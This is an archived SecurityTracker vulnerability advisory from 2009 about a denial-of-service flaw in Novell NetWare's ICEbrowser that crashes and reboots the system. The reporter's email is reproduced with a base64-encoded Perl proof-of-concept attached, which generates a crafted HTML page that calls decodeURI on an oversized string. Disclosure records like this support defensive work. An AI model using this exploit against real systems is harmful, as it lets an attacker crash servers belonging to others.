SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Generic)  >   NetWare Vendors:   Novell
NetWare ICEbrowser Bug Lets Remote Users Deny Service
SecurityTracker Alert ID:  1021607
SecurityTracker URL:  http://securitytracker.com/id/1021607
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 15 2009
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 6.5 SP6 (ICEbrowser 6.1.2)
Description:   Jeremy Brown reported a vulnerability in Novell NetWare ICEbrowser. A remote user can cause denial of service conditions.

A remote user can create specially crafted HTML that, when loaded by the target user, will trigger a flaw in SERVER.NLM and cause the target user's system to crash and reboot.

Some demonstration exploit code is available at:

http://stashbox.org/361821/novellnw_ib_sysdos.pl
Impact:   A remote user can create HTML that, when loaded by the target user, will cause the target user's browser to crash and reboot.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.novell.com/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  

Message History:   None.

 Source Message Contents
Date:  Wed, 14 Jan 2009 22:40:58 -0500
Subject:  netware submission

See Attached.

Thank you,

Jeremy

------=_Part_333723_843593.1231990858246
Content-Type: application/x-perl; name=novellnw_ib_sysdos.pl
Content-Transfer-Encoding: base64
X-Attachment-Id: f_fpyviz950
Content-Disposition: attachment; filename=novellnw_ib_sysdos.pl

IyEvdXNyL2Jpbi9wZXJsCiMgbm92ZWxsbndfaWJfc3lzZG9zLnBsCiMgTm92ZWxsIE5ldHdhcmUg
Ni41IChJQ0Vicm93c2VyKSBSZW1vdGUgU3lzdGVtIERlbmlhbCBvZiBTZXJ2aWNlIEV4cGxvaXQK
IyBKZXJlbXkgQnJvd24gWzB4amJyb3duNDFAZ21haWwuY29tL2picm93bnNlYy5ibG9nc3BvdC5j
b21dCiMKIyAiTW96aWxsYS81LjAgKE5ldFdhcmU7IFU7IE5ldFdhcmUgNi41MC4wNjsgZW4tVVMp
IElDRWJyb3dzZXIvNi4xLjIgTm92ZWxsVmlld1BvcnQvMy43LjIiCiMKIyBBZnRlciB0YXJnZXQg
dmlld3MgZXhwbG9pdCBwYWdlLCB0aGUgYnJvd3NlciB3aWxsIHNvcnRhIGhhbmcsIHRoZW4gYSBm
YXVsdCBvY2N1cnMgYW5kIHRoZSBzeXN0ZW0gcmVib290cy4KIyAKIyBBYmVuZCAxIG9uIFAwMDog
U2VydmVyLTUuNzAuMDY6IFBhZ2UgRmF1bHQgUHJvY2Vzc29yIEV4Y2VwdGlvbiAoRXJyb3IgY29k
ZSAwMDAwMDAwMCkKIyAKIyBSZWdpc3RlcnM6CiMgICAgIENTID0gMDAwOCBEUyA9IDAwMTAgRVMg
PSAwMDEwIEZTID0gMDAxMCBHUyA9IDAwN0IgU1MgPSAwMDEwCiMgICAgIEVBWCA9IDAwMDAwMDAw
IEVCWCA9IDk2ODdFRjRDIEVDWCA9IDAwNEVCOEYwIEVEWCA9IDAwMDAwMEU0CiMgICAgIEVTSSA9
IDAwMDAwMDAwIEVESSA9IDAwMDAwMDAxIEVCUCA9IDhEOUU3RjNDIEVTUCA9IDg2MTc5RUY0CiMg
ICAgIEVJUCA9IDAwMDAwMDAwIEZMQUdTID0gMDAwMTAwODYgCiMgICAgIAojICAgICBBY2Nlc3Mg
TG9jYXRpb246IDB4MDAwMDAwMDAKIyAKIyAiQWRkaXRpb25hbCBJbmZvcm1hdGlvbjogVGhlIGhh
cmR3YXJlIGRldGVjdGVkIGEgcHJvYmxlbSB3aGlsZSBleGVjdXRpbmcgYW4gaW50ZXJydXB0CiMg
c2VydmljZSByb3V0aW5lLiAgVGhlIGNvZGUgYmVpbmcgZXhlY3V0ZWQgaXMgb3duZWQgYnkgU0VS
VkVSLk5MTS4gIEl0IG1heSBiZSB0aGUgc291cmNlCiMgb2YgdGhlIHByb2JsZW0gb3IgdGhlcmUg
bWF5IGhhdmUgYmVlbiBhIG1lbW9yeSBjb3JydXB0aW9uLiIKIyAKIyBUZXN0ZWQgb24gTm92ZWxs
IE5ldHdhcmUgNi41IFNQNiAoNS43MC4wNikKCiRmaWxlbmFtZSA9ICRBUkdWWzBdOwppZighZGVm
aW5lZCgkZmlsZW5hbWUpKQp7CgogICAgIHByaW50ICJVc2FnZTogJDAgPGZpbGVuYW1lLmh0bWw+
XG4iOwoKfQoKJGhlYWQgPSAiPGh0bWw+IiAuICJcbiIgLiAiPHNjcmlwdCB0eXBlPVwidGV4dC9q
YXZhc2NyaXB0XCI+IiAuICJcbiI7CiR0cmlnID0gImRlY29kZVVSSShcIiIgLiAiQSIgeCA1MDA1
MDAwIC4gIlwiKTsiIC4gIlxuIjsKJGZvb3QgPSAiPC9zY3JpcHQ+IiAuICJcbiIgLiAiPC9odG1s
PiI7CgokZGF0YSA9ICRoZWFkIC4gJHRyaWcgLiAkZm9vdDsKCiAgICAgb3BlbihGSUxFLCAnPicg
LiAkZmlsZW5hbWUpOwogICAgIHByaW50IEZJTEUgJGRhdGE7CiAgICAgY2xvc2UoRklMRSk7Cgpl
eGl0Ow==
------=_Part_333723_843593.1231990858246--


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2013, SecurityGlobal.net LLC